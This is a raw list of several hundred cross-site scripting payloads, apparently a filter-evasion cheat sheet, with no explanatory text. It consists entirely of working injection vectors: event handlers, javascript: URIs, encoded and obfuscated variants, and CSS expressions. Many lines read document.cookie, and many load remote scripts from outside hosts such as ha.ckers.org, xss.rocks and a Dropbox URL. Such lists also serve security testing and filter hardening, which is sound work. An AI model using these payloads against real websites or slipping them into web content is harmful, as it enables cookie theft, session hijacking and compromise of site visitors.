<DIV STYLE=\"width: expression(alert('XSS'));\">
<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>
<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">
<XSS STYLE=\"xss:expression(alert('XSS'))\">
exp/*<A STYLE='no\xss:noxss(\"*//*\");
xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>
<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>
<STYLE>.XSS{background-
image:url(\"javascript:alert('XSS')\");}</STYLE><A
CLASS=XSS></A>
<STYLE
type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</
STYLE>
<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
<BASE HREF=\"javascript:alert('XSS');//\">
<OBJECT TYPE=\"text/x-scriptlet\"
DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=javascript:alert('XSS')></OBJECT>
<EMBED SRC=\"http://ha.ckers.org/xss.swf\"
AllowScriptAccess=\"always\"></EMBED>
<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\"
AllowScriptAccess=\"always\"></EMBED>
a=\"get\";
b=\"URL(\\"\";
c=\"javascript:\";
d=\"alert('XSS');\\")\";
eval(a+b+c+d);
<HTML xmlns:xss><?import namespace=\"xss\"
implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>
XSS</xss:xss></HTML>
<XML ID=I><X><C><![CDATA[<IMG
SRC=\"javas]]><!
[CDATA[cript:alert('XSS');\">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C
DATAFORMATAS=HTML></SPAN>
<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- --
>cript:alert('XSS')\"></B></I></XML>
<SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>
<XML SRC=\"xsstest.xml\" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML><BODY>
<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">
<?import namespace=\"t\" implementation=\"#default#time2\">
<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT
DEFER>alert("XSS")</SCRIPT>\">
</BODY></HTML>
<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>
<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT
SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->
<? echo('<SCR)';
echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>
<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?
somevariables=maliciouscode\">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV=\"Set-Cookie\"
Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">
<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-
7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=\">\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT =\">\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=\">\" ''
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT \"a='>'\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=`>`
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=\">'>\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<A HREF=\"http://66.102.7.147/\">XSS</A>
<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>
<A HREF=\"http://1113982867/\">XSS</A>
<A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>
<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>
<A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A>
<A HREF=\"//www.google.com/\">XSS</A>
<A HREF=\"//google\">XSS</A>
<A HREF=\"http://ha.ckers.org@google\">XSS</A>
<A HREF=\"http://google:ha.ckers.org\">XSS</A>
<A HREF=\"http://google.com/\">XSS</A>
<A HREF=\"http://www.google.com./\">XSS</A>
<A
HREF=\"javascript:document.location='http://www.google.com/'\"&g
t;XSS</A>
<A
HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS&
lt;/A>
<
%3C
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
\x3c
\x3C
\u003c
\u003C
<iframe src=http://ha.ckers.org/scriptlet.html>
<IMG SRC=\"javascript:alert('XSS')\"
<SCRIPT SRC=//ha.ckers.org/.js>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<<SCRIPT>alert(\"XSS\");//<</SCRIPT>
<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>
<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<IMG SRC=\" javascript:alert('XSS');\">
perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav	ascript:alert('XSS');\">
<IMG
SRC=javascript:alert&
#x28'XSS')>
<IMG
SRC=javascrip
t:alert('�
00088SS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=\"javascript:alert('XSS');\">
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
'';!--\"<XSS>=&{()}
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83
))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88
,83,83))//--></
SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</
SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";al
ert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascrscriptipt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
exp/*<A
STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import
namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML"
to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></BODY></HTML>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<form id="test" /><button form="test"
formaction="javascript:alert(123)">TESTHTML5FORMACTION
<form><button formaction="javascript:alert(123)">crosssitespt
<frameset onload=alert(123)>
<!--<img src="--><img src=x onerror=alert(123)//">
<style><img src="</style><img src=x onerror=alert(123)//">
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="javascript:alert(1)">
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
<script>({0:#0=alert/#0#/#0#(123)})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function()
{alert(123)}),x</script>
<script>Object.__noSuchMethod__ =
Function,[{}][0].constructor._('alert(1)')()</script>
<script src="#">{alert(1)}</script>;1
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-
use')</script>
<svg xmlns="#"><script>alert(1)</script></svg>
<svg onload="javascript:alert(123)" xmlns="#"></svg>
<iframe xmlns="#" src="javascript:alert(1)"></iframe>
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
%253cscript%253ealert(document.cookie)%253c/script%253e
“><s”%2b”cript>alert(document.cookie)</script>
“><ScRiPt>alert(document.cookie)</script>
“><<script>alert(document.cookie);//<</script>
foo<script>alert(document.cookie)</script>
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://
my.box.com/xss.js%3E%3C/script%3E%22)’%3E
‘; alert(document.cookie); var foo=’
foo\’; alert(document.cookie);//’;
</script><script >alert(document.cookie)</script>
<img src=asdf onerror=alert(document.cookie)>
<BODY ONLOAD=alert(’XSS’)>
<script>alert(1)</script>
"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
<video src=1 onerror=alert(1)>
<audio src=1 onerror=alert(1)>
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";ale
rt(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG
SRC=javascript:ale&#
114;t(
'XSS')>
<IMG
SRC=javascrip
t:a&
#0000108ert('XSS�
0039)>
<IMG
SRC=javascript:alert&
#x28'XSS')>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</script><script>alert('XSS');</script>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A
CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html
base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT
SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?
somevariables=maliciouscode">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
veris-->group<svg/onload=alert(/XSS/)//
#"><img src=M onerror=alert('XSS');>
element[attribute='<img src=x onerror=alert('XSS');>
[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
%22;alert%28%27RVRSH3LL_XSS%29//
javascript:alert%281%29;
<w contenteditable id=x onfocus=alert()>
alert;pg("XSS")
<svg/onload=%26%23097lert%26lpar;1337)>
<script>for((i)in(self))eval(i)(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
<sCR<script>iPt>alert(1)</SCr</script>IPt>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onended="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))">
<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)";
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<INPUT TYPE="BUTTON" action="alert('XSS')"/>
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe
frameborder="0%EF%BB%BF
"><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE"
frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1>
"><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE"
frameborder="0" allowfullscreen></iframe>123</h1>
><h1><IFRAME width="420" height="315" frameborder="0"
onmouseover="document.location.href='https://www.youtube.com/channel/
UC9Qa_gXarSmObPX3ooIQZr
g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250
<IFRAME width="420" height="315" frameborder="0"
onload="alert(document.cookie)"></IFRAME>
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
<iframe src=http://xss.rocks/scriptlet.html <
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<iframe src="	javascript:prompt(1)	">
<svg><style>{font-family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"
<sVg><scRipt >alert(1) {Opera}
<img/src=`` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript:confirm(1)"
<img src=``
 onerror=alert(1)

<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /**/>/**/alert(1)/**/</script /**/
"><h1/onmouseover='\u0061lert(1)'>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-
equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/') </script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a
href="javascript:\u0061lert(1)">X</script><img/*/src="worksinchrome:p
rompt(1)"/*/onerror='eval(src)'>
<img/	  src=`~` onerror=prompt(1)>
<form><iframe 	  src="javascript:alert(1)" 	;>
<a href="data:application/x-x509-user-
cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X<
/a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
�</form><input type="date" onfocus="alert(1)">
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
</script /***/
<iframe srcdoc='<body onload=prompt(1)>'>
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
<script ~~~>alert(0%0)</script ~~~>
<style/onload=<!--	> alert (1)>
<///style///><span %2F onmousemove='alert(1)'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert(1)'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe// src=javaSCRIPT:alert(1)
//<form/action=javascript:alert(document.cookie)><input/
type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\
</script //|\\
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
<a/href="javascript: javascript:prompt(1)"><input type="X">
</plaintext\></|\><plaintext/onmouseover=prompt(1)
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
<a href="javascript:\u0061le%72t(1)"><button>
<div onmouseover='alert(1)'>DIV</div>
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)">
<a href="jAvAsCrIpT:alert(1)">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/
helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/
helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>
<a href=javascript:alert(document.cookie)>Click Here</a>
